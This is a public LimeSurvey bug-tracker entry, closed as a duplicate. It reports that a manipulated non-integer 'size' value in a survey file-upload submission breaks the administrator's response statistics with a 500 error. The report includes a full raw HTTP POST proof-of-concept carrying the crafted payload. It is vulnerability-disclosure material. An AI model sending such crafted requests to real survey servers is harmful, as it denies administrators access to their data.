View Issue Details

Jump to NotesJump to History
This bug affects 1 person(s).
 252
IDProjectCategoryView StatusDate SubmittedLast Update
19720Bug reportsSecuritypublic2024-08-26 11:492024-08-26 11:57
Reporterjudx Assigned ToDenisChenu  
PrioritynoneSeverityminor 
Status closedResolutionduplicate 
Summary19720: Improper Input Validation
Description

Just wanted to flag another pretty serious issue with LimeSurvey related to improper input validation. It seems that when using the file upload option in surveys, the system doesn't properly validate the size of uploaded files. Attackers can manipulate the size parameter, which can lead to a denial of service, making it impossible for admins to access survey stats.

More details:

This issue is currently blocking the use of LimeSurvey safely.

Steps To Reproduce

Reproduction

  1. Log in to the administrator account.
  2. Create a survey containing the "file upload" option. For Examples: 949614.
  3. During the survey submission process, use manipulated data to set the "size" parameter to a non-integer value. [No permissions are required]
  4. POST 
    
POST /index.php/949614 HTTP/1.1 
Host: 192.168.160.130 
Content-Length: 1706 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoGwet3umTM5p8M8U 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close

------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="YII_CSRF_TOKEN"

X3VhN0Y2cmIyNVhCMXdFV1BQN0pqVm5iWWw0Q1NpNWKEYOQK5nWbFzgIPM_Ra9R9HWiCLpQjslDBrDKki4XtyQ==
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="fieldnames"

949614X1X1|949614X1X2|949614X1X2_filecount
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="thisstep"

1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="sid"

949614
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="start_time"

1692852765
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="LEMpostKey"

1887323363
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance1"

1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance2"

1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevanceG0"

1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X1"

aeawe
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2"

[{"title":"","comment":"","size":"5.201171875tesat","name":"GAIA-URL.txt","filename":"futmp_drezdtkw4u3rsf8_txt","ext":"txt"}] ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2_filecount"

1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="lastgroup"

949614X1
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="move"

movesubmit
------WebKitFormBoundaryoGwet3umTM5p8M8U--


5. Open http://192.168.160.130/index.php/responses/browse?surveyId=135964 The administrator is unable to open all statistical data for this questionnaire and prompts: Error code 500: Internal server error round(): Argument #1 ($num) must be of type int|float, string given.
TagsNo tags attached.
Bug heat252
Complete LimeSurvey version number (& build)6.3.0-231016
I will donate to the project if issue is resolvedNo
Browser
Database type & versionany
Server OS (if known)
Webserver software & version (if known)
PHP Versionany

Users monitoring this issue

There are no users monitoring this issue.

Activities

DenisChenu

DenisChenu

2024-08-26 11:57

developer   ~80826

Please check it before report again :)

Issue History

Date Modified Username Field Change
2024-08-26 11:49 judx New Issue
2024-08-26 11:57 DenisChenu Assigned To => DenisChenu
2024-08-26 11:57 DenisChenu Status new => closed
2024-08-26 11:57 DenisChenu Resolution open => duplicate
2024-08-26 11:57 DenisChenu Note Added: 80826
2024-08-26 11:57 DenisChenu Bug heat 250 => 252